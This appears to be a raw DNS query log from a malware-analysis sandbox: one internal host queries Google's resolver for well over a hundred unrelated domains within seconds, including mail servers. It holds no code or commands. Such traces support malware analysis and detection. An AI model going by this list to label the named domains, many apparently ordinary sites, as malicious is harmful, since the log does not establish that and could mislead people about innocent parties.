                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.109575987 CEST192.168.2.38.8.8.80x7cafStandard query (0)daytonir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.109648943 CEST192.168.2.38.8.8.80x1d02Standard query (0)enguita.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.109921932 CEST192.168.2.38.8.8.80x6362Standard query (0)slower.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.110311031 CEST192.168.2.38.8.8.80xc9eeStandard query (0)umcor.amA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.242392063 CEST192.168.2.38.8.8.80x4fb5Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.291116953 CEST192.168.2.38.8.8.80x3cd5Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.319335938 CEST192.168.2.38.8.8.80xfeddStandard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.354487896 CEST192.168.2.38.8.8.80xb203Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.378566980 CEST192.168.2.38.8.8.80xcb7fStandard query (0)rappich.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.421149969 CEST192.168.2.38.8.8.80xe87cStandard query (0)holp-ai.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.424222946 CEST192.168.2.38.8.8.80xb357Standard query (0)a-domani.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.598591089 CEST192.168.2.38.8.8.80x9342Standard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.622997999 CEST192.168.2.38.8.8.80x1856Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.686382055 CEST192.168.2.38.8.8.80x1717Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.686422110 CEST192.168.2.38.8.8.80x9e70Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.712032080 CEST192.168.2.38.8.8.80x62a6Standard query (0)gbmfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.740840912 CEST192.168.2.38.8.8.80x5852Standard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.760037899 CEST192.168.2.38.8.8.80x4bc8Standard query (0)agulatex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.763693094 CEST192.168.2.38.8.8.80x827dStandard query (0)www.reglera.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.780142069 CEST192.168.2.38.8.8.80xb63bStandard query (0)yasuma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.800153017 CEST192.168.2.38.8.8.80x89f5Standard query (0)mcseurope.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.831928968 CEST192.168.2.38.8.8.80xe0d4Standard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.848191977 CEST192.168.2.38.8.8.80x2f4Standard query (0)tozzhin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.909440041 CEST192.168.2.38.8.8.80x6bfbStandard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.982146025 CEST192.168.2.38.8.8.80x51a9Standard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.121057987 CEST192.168.2.38.8.8.80x6d02Standard query (0)rkengg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.145015955 CEST192.168.2.38.8.8.80x8faStandard query (0)hamaker.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.223808050 CEST192.168.2.38.8.8.80x45bbStandard query (0)hes.ptA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.224690914 CEST192.168.2.38.8.8.80x97feStandard query (0)epc.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.249090910 CEST192.168.2.38.8.8.80x4fb5Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.281177998 CEST192.168.2.38.8.8.80xc2bbStandard query (0)softizer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.296129942 CEST192.168.2.38.8.8.80x46f5Standard query (0)cvswl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.312987089 CEST192.168.2.38.8.8.80xccd0Standard query (0)yoruksut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.363565922 CEST192.168.2.38.8.8.80x5591Standard query (0)hchc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.424711943 CEST192.168.2.38.8.8.80xb5b6Standard query (0)uster.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.467713118 CEST192.168.2.38.8.8.80x61ebStandard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.489465952 CEST192.168.2.38.8.8.80xc1aeStandard query (0)keio-web.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.536015034 CEST192.168.2.38.8.8.80x4bbeStandard query (0)vdoherty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.592813969 CEST192.168.2.38.8.8.80xb40fStandard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.597434044 CEST192.168.2.38.8.8.80x1ae0Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.628607035 CEST192.168.2.38.8.8.80x3a9dStandard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.659825087 CEST192.168.2.38.8.8.80xc83eStandard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.661959887 CEST192.168.2.38.8.8.80x5401Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.686120987 CEST192.168.2.38.8.8.80x8cc7Standard query (0)uster.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.697972059 CEST192.168.2.38.8.8.80x46aStandard query (0)rokoron.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.718111038 CEST192.168.2.38.8.8.80x4749Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.720016003 CEST192.168.2.38.8.8.80xc3cfStandard query (0)biosolve.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.725356102 CEST192.168.2.38.8.8.80xaf1Standard query (0)epc.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.733411074 CEST192.168.2.38.8.8.80x790fStandard query (0)envogen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.741473913 CEST192.168.2.38.8.8.80x9953Standard query (0)sidepath.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.874195099 CEST192.168.2.38.8.8.80xbefeStandard query (0)bggs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.909337044 CEST192.168.2.38.8.8.80xa8f6Standard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.942033052 CEST192.168.2.38.8.8.80xe1daStandard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.964780092 CEST192.168.2.38.8.8.80xaffdStandard query (0)vdoherty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.966512918 CEST192.168.2.38.8.8.80x298eStandard query (0)yasuma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.985081911 CEST192.168.2.38.8.8.80x6fe0Standard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:11.065221071 CEST192.168.2.38.8.8.80x9e82Standard query (0)ccrsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:11.124357939 CEST192.168.2.38.8.8.80x7d3aStandard query (0)araax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:11.160967112 CEST192.168.2.38.8.8.80x6dddStandard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:11.183666945 CEST192.168.2.38.8.8.80x207dStandard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:11.222156048 CEST192.168.2.38.8.8.80xaa43Standard query (0)missnue.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:11.249460936 CEST192.168.2.38.8.8.80xb7aStandard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:11.285317898 CEST192.168.2.38.8.8.80x4fb5Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:11.386185884 CEST192.168.2.38.8.8.80x925fStandard query (0)duiops.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:11.390338898 CEST192.168.2.38.8.8.80x9d23Standard query (0)atb-lit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:11.509648085 CEST192.168.2.38.8.8.80xa1e5Standard query (0)iranytu.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:11.592365026 CEST192.168.2.38.8.8.80xf66eStandard query (0)sanfotek.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:11.630281925 CEST192.168.2.38.8.8.80x8339Standard query (0)doggybag.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:11.638612032 CEST192.168.2.38.8.8.80x1856Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:11.673892975 CEST192.168.2.38.8.8.80x988fStandard query (0)esmoke.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:11.689220905 CEST192.168.2.38.8.8.80xfd93Standard query (0)ccssinc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:11.803435087 CEST192.168.2.38.8.8.80x4d43Standard query (0)bidroll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:11.806607962 CEST192.168.2.38.8.8.80x5b3aStandard query (0)fogra.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:11.834920883 CEST192.168.2.38.8.8.80x88dStandard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:11.852786064 CEST192.168.2.38.8.8.80x746bStandard query (0)pertex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:11.877876043 CEST192.168.2.38.8.8.80x25eeStandard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:11.918014050 CEST192.168.2.38.8.8.80xadeStandard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:12.003010035 CEST192.168.2.38.8.8.80x7cccStandard query (0)603888.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:12.216147900 CEST192.168.2.38.8.8.80x58d9Standard query (0)acraloc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:12.268332005 CEST192.168.2.38.8.8.80xcbcfStandard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:12.290333986 CEST192.168.2.38.8.8.80xdf59Standard query (0)www.yocinc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:12.299599886 CEST192.168.2.38.8.8.80x9f18Standard query (0)acraloc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:12.448040962 CEST192.168.2.38.8.8.80xac1eStandard query (0)msl-lock.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:12.576678038 CEST192.168.2.38.8.8.80xb8ecStandard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:12.668009043 CEST192.168.2.38.8.8.80xafe1Standard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:12.669527054 CEST192.168.2.38.8.8.80xf52bStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:12.671473026 CEST192.168.2.38.8.8.80x5be2Standard query (0)kursavto.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:12.956625938 CEST192.168.2.38.8.8.80xad24Standard query (0)nlcv.bas.bgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:12.957387924 CEST192.168.2.38.8.8.80xb650Standard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:12.959053993 CEST192.168.2.38.8.8.80x7439Standard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:12.960397959 CEST192.168.2.38.8.8.80xe384Standard query (0)aoinko.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:13.010788918 CEST192.168.2.38.8.8.80xf3a1Standard query (0)aba.org.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:13.092747927 CEST192.168.2.38.8.8.80x2acdStandard query (0)vivastay.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:13.095031977 CEST192.168.2.38.8.8.80xb87eStandard query (0)pers.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:13.098530054 CEST192.168.2.38.8.8.80x150cStandard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:13.144695044 CEST192.168.2.38.8.8.80x17e6Standard query (0)enguita.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:13.240711927 CEST192.168.2.38.8.8.80x759Standard query (0)avse.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:13.358995914 CEST192.168.2.38.8.8.80xb5b2Standard query (0)www.kernsafe.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:13.361434937 CEST192.168.2.38.8.8.80x4fb5Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:13.459568024 CEST192.168.2.38.8.8.80x9f36Standard query (0)tozzhin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:13.534960032 CEST192.168.2.38.8.8.80x5c48Standard query (0)epc.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:13.539819002 CEST192.168.2.38.8.8.80xb67fStandard query (0)portoccd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:13.603740931 CEST192.168.2.38.8.8.80xe07fStandard query (0)zemarmot.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:13.725282907 CEST192.168.2.38.8.8.80x7b0Standard query (0)ossir.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:13.787573099 CEST192.168.2.38.8.8.80xc181Standard query (0)scintel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:13.788212061 CEST192.168.2.38.8.8.80xf52bStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:13.842744112 CEST192.168.2.38.8.8.80x1d3bStandard query (0)www.vitaindu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:13.914158106 CEST192.168.2.38.8.8.80xd801Standard query (0)paraski.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:13.921188116 CEST192.168.2.38.8.8.80x3021Standard query (0)uhsa.edu.agA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:13.931983948 CEST192.168.2.38.8.8.80xc589Standard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:14.434568882 CEST192.168.2.38.8.8.80xc7d8Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:14.454365969 CEST192.168.2.38.8.8.80x22Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:14.635828972 CEST192.168.2.38.8.8.80x413eStandard query (0)araax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:14.662333012 CEST192.168.2.38.8.8.80xa126Standard query (0)webavant.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:14.698088884 CEST192.168.2.38.8.8.80x856eStandard query (0)umcor.amA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:14.766074896 CEST192.168.2.38.8.8.80x2f5fStandard query (0)www.ottospm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:14.769911051 CEST192.168.2.38.8.8.80x739eStandard query (0)nme.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:14.773138046 CEST192.168.2.38.8.8.80xa7faStandard query (0)geecl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:14.899045944 CEST192.168.2.38.8.8.80x4a2dStandard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:14.936058044 CEST192.168.2.38.8.8.80xcf92Standard query (0)sjbmw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:14.960203886 CEST192.168.2.38.8.8.80xf52bStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:14.971180916 CEST192.168.2.38.8.8.80x1580Standard query (0)cyclad.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:15.140855074 CEST192.168.2.38.8.8.80x7534Standard query (0)dyag-eng.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:15.141499043 CEST192.168.2.38.8.8.80x56c0Standard query (0)ccrsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:15.848741055 CEST192.168.2.38.8.8.80xc7d8Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.014866114 CEST192.168.2.38.8.8.80x6c80Standard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.030260086 CEST192.168.2.38.8.8.80x82d8Standard query (0)aluminox.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.138034105 CEST192.168.2.38.8.8.80x22Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.223351955 CEST192.168.2.38.8.8.80x1889Standard query (0)sidepath.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.291295052 CEST192.168.2.38.8.8.80x9948Standard query (0)www.valselit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.304444075 CEST192.168.2.38.8.8.80x2243Standard query (0)biurohera.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.312341928 CEST192.168.2.38.8.8.80xb16aStandard query (0)www.ex-olive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.316189051 CEST192.168.2.38.8.8.80xd208Standard query (0)pertex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.321274042 CEST192.168.2.38.8.8.80xde24Standard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.329066992 CEST192.168.2.38.8.8.80xf3Standard query (0)gcss.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.346522093 CEST192.168.2.38.8.8.80xd916Standard query (0)holp-ai.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.373977900 CEST192.168.2.38.8.8.80x61deStandard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.421442032 CEST192.168.2.38.8.8.80xa110Standard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.431142092 CEST192.168.2.38.8.8.80xa464Standard query (0)fifa-ews.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.438997030 CEST192.168.2.38.8.8.80x7c6bStandard query (0)isom.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.507401943 CEST192.168.2.38.8.8.80x2f22Standard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.514375925 CEST192.168.2.38.8.8.80x86e3Standard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.515515089 CEST192.168.2.38.8.8.80x823Standard query (0)www.railbook.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.536482096 CEST192.168.2.38.8.8.80x4f9cStandard query (0)smtp.compuserve.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.544107914 CEST192.168.2.38.8.8.80x911eStandard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.580354929 CEST192.168.2.38.8.8.80xe8b5Standard query (0)www.ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.607188940 CEST192.168.2.38.8.8.80xa71fStandard query (0)kewlmail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.630089045 CEST192.168.2.38.8.8.80x20d0Standard query (0)www.2print.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.668693066 CEST192.168.2.38.8.8.80x5511Standard query (0)oh28ya.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.671916008 CEST192.168.2.38.8.8.80x5b7aStandard query (0)siongann.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.672153950 CEST192.168.2.38.8.8.80xf01eStandard query (0)oaith.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.688910007 CEST192.168.2.38.8.8.80xbe4aStandard query (0)msl-lock.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.753506899 CEST192.168.2.38.8.8.80xced2Standard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.793232918 CEST192.168.2.38.8.8.80x8334Standard query (0)ie-roi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.803845882 CEST192.168.2.38.8.8.80x315fStandard query (0)akdeniz.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.813079119 CEST192.168.2.38.8.8.80x13bdStandard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.830030918 CEST192.168.2.38.8.8.80x4b6fStandard query (0)reproar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.844172001 CEST192.168.2.38.8.8.80x922Standard query (0)duiops.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.848798037 CEST192.168.2.38.8.8.80x3590Standard query (0)agulatex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.881067991 CEST192.168.2.38.8.8.80x20adStandard query (0)dzm.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.956068039 CEST192.168.2.38.8.8.80x14f8Standard query (0)www.elpro.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.963056087 CEST192.168.2.38.8.8.80xdebaStandard query (0)www.nunomira.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.968713045 CEST192.168.2.38.8.8.80xf52bStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.095928907 CEST192.168.2.38.8.8.80xb735Standard query (0)www.iamdirt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.096203089 CEST192.168.2.38.8.8.80xf446Standard query (0)www.transsib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.103224993 CEST192.168.2.38.8.8.80x7dc0Standard query (0)www.depalo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.106509924 CEST192.168.2.38.8.8.80x3786Standard query (0)www.x0c.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.191958904 CEST192.168.2.38.8.8.80xc0adStandard query (0)www.wifi4all.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.224808931 CEST192.168.2.38.8.8.80x5721Standard query (0)www.naoi-a.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.234146118 CEST192.168.2.38.8.8.80xdc9fStandard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.243554115 CEST192.168.2.38.8.8.80x3d78Standard query (0)nolaoig.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.258409977 CEST192.168.2.38.8.8.80xfd90Standard query (0)www.petsfan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.277482986 CEST192.168.2.38.8.8.80x66d4Standard query (0)www.fcwcvt.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.292295933 CEST192.168.2.38.8.8.80x32c2Standard query (0)kamptal.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.307656050 CEST192.168.2.38.8.8.80x6fcbStandard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.339217901 CEST192.168.2.38.8.8.80x74bbStandard query (0)www.vexcom.comA (IP address)IN (0x0001)false
